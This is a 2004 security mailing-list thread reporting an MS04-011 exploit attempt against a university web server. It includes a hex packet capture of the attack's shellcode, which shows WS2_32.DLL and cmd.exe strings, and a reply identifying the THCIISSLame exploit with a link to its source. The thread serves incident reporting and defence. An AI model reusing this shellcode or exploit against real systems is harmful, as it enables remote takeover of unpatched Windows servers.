Security Incidents mailing list archives
RE: Heads up: Looks like MS04-011 exploit is being tried against www.domain
From: "Rob Shein" <shoten () starpower net>
Date: Tue, 27 Apr 2004 10:40:12 -0400
It's the new THCIISLame exploit, out on 4/21. http://www.thc.org/exploits/THCIISSLame.c
-----Original Message----- From: James Riden [mailto:j.riden () massey ac nz] Sent: Monday, April 26, 2004 11:14 PM To: incidents () securityfocus com Subject: Heads up: Looks like MS04-011 exploit is being tried against www.domain Seen as long ago as 25/04/2004. Haven't seen it used against any other servers here, so it's obviously targetted in some way. Example packet capture: 000 : 80 62 01 02 BD 00 01 00 01 00 16 8F 82 01 00 00 .b.............. 010 : 00 EB 0F 54 48 43 4F 57 4E 5A 49 49 53 21 32 5E ...THCOWNZIIS!2^ 020 : BE 98 EB 25 03 E7 3E D8 08 24 02 06 6C 59 6C 59 ...%..>..$..lYlY 030 : F8 1D 9C DE 8C D1 4C 70 D4 03 58 46 57 53 32 5F ......Lp..XFWS2_ 040 : 33 32 2E 44 4C 4C 01 EB 05 E8 F9 FF FF FF 5D 83 32.DLL........]. 050 : ED 2C 6A 30 59 64 8B 01 8B 40 0C 8B 70 1C AD 8B .,j0Yd...@..p... 060 : 78 08 8D 5F 3C 8B 1B 01 FB 8B 5B 78 01 FB 8B 4B x.._<.....[x...K 070 : 1C 01 F9 8B 53 24 01 FA 53 51 52 8B 5B 20 01 FB ....S$..SQR.[ .. 080 : 31 C9 41 31 C0 99 8B 34 8B 01 FE AC 31 C2 D1 E2 1.A1...4....1... 090 : 84 C0 75 F7 0F B6 45 09 8D 44 45 08 66 39 10 75 ..u...E..DE.f9.u 0a0 : E1 66 31 10 5A 58 5E 56 50 52 2B 4E 10 41 0F B7 .f1.ZX^VPR+N.A.. 0b0 : 0C 4A 8B 04 88 01 F8 0F B6 4D 09 89 44 8D D8 FE .J.......M..D... 0c0 : 4D 09 75 BE FE 4D 08 74 17 FE 4D 24 8D 5D 1A 53 M.u..M.t..M$.].S 0d0 : FF D0 89 C7 6A 02 58 88 45 09 80 45 79 0C EB 82 ....j.X.E..Ey... 0e0 : 89 CE 31 DB 53 53 53 53 56 46 56 FF D0 89 C7 55 ..1.SSSSVFV....U 0f0 : 58 66 89 30 6A 10 55 57 FF 55 E0 8D 45 88 50 FF Xf.0j.UW.U..E.P. 100 : 55 E8 55 55 FF 55 EC 8D 44 05 0C 94 53 68 2E 65 U.UU.U..D...Sh.e 110 : 78 65 68 5C 63 6D 64 94 31 D2 8D 45 CC 94 57 57 xeh\cmd.1..E..WW 120 : 57 53 53 FE CA 01 F2 52 94 8D 45 78 50 8D 45 88 WSS....R..ExP.E. 130 : 50 B1 08 53 53 6A 10 FE CE 52 53 53 53 55 FF 55 P..SSj...RSSSU.U 140 : F0 6A FF FF 55 E4 .j..U. -- James Riden / j.riden () massey ac nz / Systems Security Engineer GPG public key available at: http://www.massey.ac.nz/~jriden/ This post > does not necessarily represent the views of my employer. -------------------------------------------------------------- ------------- -------------------------------------------------------------- --------------
--------------------------------------------------------------------------- ----------------------------------------------------------------------------
Current thread:
- Malformed DNS or something odd (or just me) Steven Trewick (Apr 09)
- RE: Malformed DNS or something odd (or just me) James C Slora Jr (Apr 10)
- Heads up: Looks like MS04-011 exploit is being tried against www.domain James Riden (Apr 27)
- RE: Heads up: Looks like MS04-011 exploit is being tried against www.domain Rob Shein (Apr 27)
- Re: Heads up: Looks like MS04-011 exploit is being tried againstwww.domain falcon (Apr 27)